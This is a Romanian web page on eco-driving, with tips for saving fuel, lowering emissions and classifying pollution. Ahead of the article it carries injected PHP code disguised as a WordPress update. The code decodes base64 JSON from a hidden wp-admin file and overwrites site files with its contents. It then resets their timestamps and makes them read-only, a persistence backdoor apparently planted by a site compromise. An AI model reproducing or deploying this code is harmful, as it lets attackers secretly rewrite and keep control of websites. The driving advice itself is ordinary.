$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Şofează ECO – O noua atitudine

Închide. Stinge. Reciclează.

Mediu – definiţie  = ansamblu de condiţii şi elemente naturale ale Terei: aerul, apa, solul şi subsolul, aspecte caracteristice ale peisajului, toate straturile atmosferice, toate materiile organice şi anorganice, precum şi fiinţele vii, sistemele naturale în interacţiune cuprinzând elementele enumerate anterior, inclusiv valorile materiale şi spirituale, calitatea vieţii şi condiţiile
care pot influenţa bunăstarea şi sănătatea.

Gândeşte durabil!

A conduce ecologic înseamnă a conduce mai atent, cu implicaţii pozitive în protecţia mediului, a reduce consumul de combustibil, a reduce impactul negativ asupra mediului.

Sfaturi privind protecţia mediului înconjurător, economisirea de combustibil şi îmbunătăţirea siguranţei rutiere:

•    reglarea corectă a unui motor are un rol decisiv atât asupra consumului specific de combustibil, cât şi asupra nivelului poluării chimice;
•    prin exploatare corespunzatoare şi reglare corectă a motorului se urmareşte menţinerea performanţelor iniţiale de economicitate şi dinamicitate plus o durată cât mai mare de timp a acestuia;
•    în ceea ce priveşte poluarea chimică, sursele de noxe sunt: gazele de evacuare (cca. 65%), baia de ulei (cca. 20%), carburatorul (cca. 9%) şi rezervorul de combustibil (cca. 6%);
•    asiguraţi reviziile maşinii în conformitate cu manualul de utilizare;
•    evitaţi/îndepărtaţi greutatea/aglomerarea portbagajului sau a portbagajului montat pe plafon;
•    evitaţi folosirea maşinii pe distanţe scurte;
•    dacă puteţi evita condusul, veţi economisi combustibil;
•    luaţi trenul, autobuzul, tramvaiul când vă duceţi să cumparati ceva, mersul pe jos sau cu bicicleta este bun pentru sanatatea dvs. şi pentru mediu;
•    înainte de a te urca în maşină, întotdeauna întreabă-te “Chiar este necesar acest drum?”
•    planificaţi călătoria, doar aşa puteţi evita abaterile de la traseu;
•    monitorizaţi şi anticipaţi condiţiile din trafic;
•    păstraţi o distanţă suficientă între autoturisme pentru a putea frâna sau face manevre de ieşire sau evitare în caz de evenimente pe carosabil;
•    verificaţi în mod regulat presiunea în pneuri;
•    rulând cu presiune mai mică în pneuri de ex. 0,5 Atm., creşte consumul cu 200 ml de benzină la 50 km, producând 350g mai mult dioxid de carbon, presiunea scăzută în pneuri poate scădea cu 2,5 – 5% după o lună şi cu 20% după 5 luni;
•    folosiţi motorul pentru încetinirea vehiculului înainte de a apăsa pe frână;
•    folosiţi treapta maximă de viteză corespunzătoare regimului de deplasare;
•    schimbaţi viteza mai devreme;
•    depăşiţi doar când este necesar;
•    menţineţi pe cât posibil o viteză constantă, evitaţi demarările bruşte;
•    renunţând la demararea în forţă reduceţi emisiile de dioxid de carbon;
•    verificaţi-vă filtrul de aer – luati în calcul un filtru permanent ce poate fi curăţat şi nu schimbat, sunt mult mai puţin restrictive decât filtrele de hartie, plus sunt mult mai bune pentru mediul înconjurator; un filtru curat de aer reprezintă cheia succesului pentru o economisire de combustibil;
•    întoarceti-va spre natura, luaţi în calcul oprirea aerului condiţionat, deschiderea geamurilor şi bucuraţi-vă de aerul proaspat sau folosiţi cu măsură aerul condiţionat şi accesoriile electrice, numai când este necesar, folosind cu masură puteţi economisi aprox. 20% din consumul de combustibil;
•    curăţaţi-vă maşina, cu cât este mai mare greutatea maşinii, cu atât combustibilul necesar este mai mult;
•    verificaţi-vă în mod regulat maşina şi vedeţi ce poate fi aruncat din ea sau dus în casă, nu este nevoie de multe pentru a îngreuna masina cu înca 20-25 kg;
•    evitaţi lăsarea motorului să funcţioneze în gol;
•    opriţi motorul dacă timpul alocat opririi depăşeşte 30 – 60 secunde ;
•    opriţi motorul când: faceţi mici cumpărături rapide, staţionaţi, sau aştepţi la fast-food drive;
•    stilul în care conduceţi ridică sau scad costurile consumului, atenţie la PICIORUL DREPT!
•    acceleraţi mai uşor când vedeţi culoarea verde, frânaţi gradat pe roşu astfel economisitţi aprox. 30 % consumul de combustibil;
•    ridicaţi piciorul de pe acceleraţie când vedeţi de la distanţă semaforul galben sau roşu;

Încearcă să conduci ecologic, TU AI DE CÂŞTIGAT!

Cheia şofatului ecologic = Gândeşte întâi!

Având astfel de cunoştinţe despre sofatul ecologic contribuiţi la reducerea emisiilor de dioxid de carbon, economisiţi foarte mulţi bani şi economie la consumul de combultibil.

ŞOFEAZĂ INTELIGENT!

Concluzie
Soluţiile raţionale care conduc la poluare redusă şi consum minim de combustibil şi la o durată mare de funcţionare a motorului sunt:

– testarea şi reglarea periodică a motorului,
– evitarea funcţionarii îndelungate la ralanti şi la regim de putere maximă,
– evitarea accelerărilor inutile şi exagerate,
– respectarea vitezei economice.

Doreşti să ai beneficii?
Atenţie la condusul în oraş!
Nu brusca motorul!
Accelerează încet!
Nu frâna ca la curse!

Economie potenţială totală de 20 – 30 %
– portbagaj montat pe plafon măreşte forţa de frecare şi, ca urmare, consumul de combustibil cu 5 – 40%;
– geamurile deschise cresc consumul de combustibil cu aprox. 5%;
– aerul condiţionat creşte consumul de combustibil cu 10 – 25%;
– schimbând viteza mai devreme se poate reduce consumul de combustibil cu 8%.

Surse de poluare: platformele industriale pot fi o sursă majoră de poluare (ex.:combinatul de îngrăşăminte chimice emite în atmosferă cantităţi însemnate de amoniac şi oxizi de azot sau combinatul de fibră artificială, produce vâscoză şi celuloză şi care emite cantităţi însemnate de hidrogen sulfurat şi sulfură de carbon.

Alte cauze care duc la depăşirea valorilor limită de calitate a aerului sunt: utilizarea combustibililor solizi – cărbune sau lemn – pentru încălzire şi gătit în gospodării şi traficul rutier,
problemă identificată, de altfel, în multe dintre statele UE.

Poluarea artificială, în functie de natura poluantului poate fi:

a) fizică – produsă de zgomot(poluare sonoră) poate fi:
– produsă de substanţe  radioactive (poluare radioactivă)
– produsă de apa caldă, praf, particule de cărbune.
b) chimică – produsă de compuşi gazoşi din industrie:
-ionii unor metale grele
-pesticidele folosite în agricultură
-detergenţii
c) biologică – rezultată din infestarea mediului cu agenti
patogeni şi germeni proveniţi din fermentaţii.

Poluarea, după mediul în care acţionează poluanţii, poate fi:
– poluarea aerului,
– poluarea solului,
– poluarea apei.

Ştiaţi că:

. . . un european foloseşte cam de zece ori mai mult combustibil şi mai multă energie decât un locuitor dintr-o ţară în curs de dezvoltare? Tot noi suntem cei care producem de trei ori
mai multe deşeuri.
. . . pe uscat, 16 specii de fluturi spanioli s-au mutat în zone montane mai înalte, în căutarea unui habitat mai răcoros?
. . . până în anul 2100, din cauza încălzirii globale se prevede o creştere a nivelului mărilor şi oceanelor de până la 88 cm? Insulele joase şi zonele de coastă ar putea fi inundate, iar circa 70 de milioane de persoane din Europa ar fi în pericol.

ŞOFEAZĂ INTELIGENT!

Având astfel de cunoştinţe despre şofatul ecologic contribui la reducerea emisiilor de dioxid de carbon, economiseşti bani şi combustibil.

By o9admin